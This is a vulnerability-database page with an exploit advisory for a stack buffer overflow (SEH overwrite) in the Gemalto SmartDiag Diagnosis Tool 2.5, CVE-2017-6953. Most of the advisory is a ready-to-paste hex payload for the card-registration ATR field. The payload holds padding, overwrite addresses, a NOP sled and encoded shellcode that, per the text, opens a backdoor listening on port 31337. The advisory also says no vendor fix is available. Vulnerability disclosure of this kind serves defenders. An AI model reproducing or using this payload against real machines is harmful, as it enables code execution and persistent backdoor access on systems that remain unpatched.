Index
Bugtraq
Pełna lista
Błędy
Sztuczki
Exploity
Dorks list
Tylko z CVE
Tylko z CWE
Bogus
Ranking
CVEMAP
Świeża lista CVE
Producenci
Produkty
Słownik CWE
Sprawdź nr. CVE
Sprawdź nr. CWE
Szukaj
W Bugtraq
W bazie CVE
Po autorze
Po nr. CVE
Po nr. CWE
Po producencie
Po produkcie
RSS
Bugtraq
CVEMAP
CVE Produkty
Tylko Błędy
Tylko Exploity
Tylko Dorks
Więcej
cIFrex
Facebook
Twitter
Donate
O bazie
Lang
Polish
English
Submit
Gemalto SmartDiag Diagnosis Tool 2.5 Buffer Overflow
2017.05.09
Credit:
Majid Alqabandi
Risk:
High
Local:
Yes
Remote:
No
CVE:
CVE-2017-6953
CWE:
CWE-119
Ogólna skala CVSS:
4.6/10
Znaczenie:
6.4/10
Łatwość wykorzystania:
3.9/10
Wymagany dostęp:
Lokalny
Złożoność ataku:
Niska
Autoryzacja:
Nie wymagana
Wpływ na poufność:
Częściowy
Wpływ na integralność:
Częściowy
Wpływ na dostępność:
Częściowy
# Exploit Title: Gemalto SmartDiag Diagnosis Tool <= v2.5 - Buffer Overflow - SEH Overwrite # Date: 16-03-2017 # Software Link: http://support.gemalto.com/index.php?id=download_tools # Exploit Author: Majid Alqabandi # Contact: https://www.linkedin.com/in/majidalqabandi/ # CVE: CVE-2017-6953 # Category: Local - command execution - Buffer Overflow - SEH Overwrite. 1. Description SymDiag.exe is vulnerable to buffer overflow, SEH overwrite. When trying to (Register a new card), Input fields are vulnerable to stack overflow attack which leads to code execution and other possible security threats. 2. Proof of Concept The following PoC is provided code will: - Exploit the vulnerability. - Execute shell code. - Create a backdoor on port 31337. To exploit, start SmartDiag.exe tool, choose "Register a new card", on the ATR use the following payload (Tested on Win7x64 & Win8x64 - SmartDiag v2.5): 528340005283400052834000528340005283400052834000528340005283 400052834000528340005283400052834000528340005283400052834000 528340005283400052834000528340005283400052834000528340005283 400052834000528340005283400052834000528340005283400052834000 528340005283400052834000528340005283400052834000528340005283 400052834000528340005283400052834000528340005283400052834000 528340005283400052834000528340005283400052834000528340005283 400052834000528340005283400052834000528340005283400052834000 528340005283400052834000528340005283400052834000528340005283 400052834000528340005283400052834000528340005283400052834000 528340005283400052834000528340005283400052834000528340005283 400052834000528340005283400052834000528340005283400052834000 528340005283400052834000528340005283400052834000528340005283 400052834000528340005283400052834000528340005283400052834000 528340005283400052834000528340005283400052834000528340005283 400052834000528340005283400052834000528340005283400052834000 528340005283400052834000528340005283400052834000528340005283 400052834000528340005283400052834000528340005283400052834000 528340005283400052834000528340005283400052834000528340005283 400052834000528340005283400052834000528340005283400052834000 528340005283400052834000528340005283400052834000528340005283 400052834000528340005283400052834000528340005283400052834000 528340005283400052834000528340005283400052834000528340005283 400052834000528340005283400052834000528340005283400052834000 528340005283400052834000528340005283400052834000528340005283 400052834000528340005283400052834000528340005283400052834000 528340005283400052834000528340005283400052834000528340005283 400052834000528340005283400052834000528340005283400052834000 528340005283400052834000528340005283400052834000528340005283 400052834000528340005283400052834000528340005283400052834000 528340005283400052834000528340005283400052834000528340005283 400052834000528340005283400052834000528340005283400052834000 528340005283400052834000528340005283400052834000528340005283 400052834000528340005283400052834000528340005283400052834000 528340005283400052834000528340005283400052834000528340005283 400052834000528340005283400052834000528340005283400052834000 528340005283400052834000528340005283400052834000528340005283 400052834000528340005283400052834000528340005283400052834000 528340005283400052834000528340005283400052834000528340005283 400052834000528340005283400052834000528340005283400052834000 528340005283400052834000528340005283400052834000528340005283 400052834000528340005283400052834000528340005283400052834000 528340005283400052834000528340005283400052834000528340005283 400052834000528340005283400052834000528340005283400052834000 528340005283400052834000528340005283400052834000528340005283 400052834000528340005283400052834000528340005283400052834000 528340005283400052834000528340005283400052834000528340005283 400052834000528340005283400052834000528340005283400052834000 528340005283400052834000528340005283400052834000528340005283 400052834000528340005283400052834000528340005283400052834000 528340005283400052834000528340005283400052834000528340005283 400052834000528340005283400052834000528340005283400052834000 528340005283400052834000528340005283400052834000528340005283 400052834000528340005283400052834000528340005283400052834000 52834000528340005283400052834000572b0410477f40008c214100f494 400041ed40003b4140003552011078ab0110010000009cf2021000100000 328b031040000000d02203100120400026e6400090909090e2f500109090 909090909090909090909090909090909090909090909090909090909090 909090909090909090909090909090909090909090909090909090909090 909090909090909090909090909090909090909090909090909090909090 909090909090909090909090909090909090909090909090909090909090 909090909090909090909090909090909090909090909090909090909090 9090909090909090ddc1d97424f4bbc4aa698a5833c9b15683e8fc315814 0358d0489c7630055f87c076e962f1a48de7a378c5aa4ff28b5ec4760450 6d3c725f6ef0ba33ac92464ee0747681f575bffcf524688aa7d81dce7bd8 f144c3a2749ab71876cb671630f30c70e102c162dd4d6e50954fa6a8567e 8667694e0b79ad69f30cc5898e161ef3549283531f046065ccd3e369b990 ac6d3c74c78ab57b081b8d5f8c4756c1952d39fec68ae65a8c39f3ddcf55 30d0efa55e638397c1df0b948af9ccdba1be432249bf4ae11defe4c01d64 f5edc82ba541a28b152212647cad4d947f67f892b153a974b06337ec3d85 adfe6b1d593d4896fe3eba8a57a9f2c46fd602c3dc7baa8496976fb4a9bd c7bf92569dd151c6a2fb016b3060d1e2293f86a39c36425e86e070a35eca 3078a3d5b90d9ff1a9cb20be9d8376684b6221da253c9eb4a1b9ec06b7c5 38f15777954468b8714111a4e1aec86c11e550c4baa00154a752fc9bded0 f46325c87d61614e6e1bfa3b9088fb69AAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 3. Solution: Vendor has been informed and confirmed the issue, no fix is available yet from vendor.
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top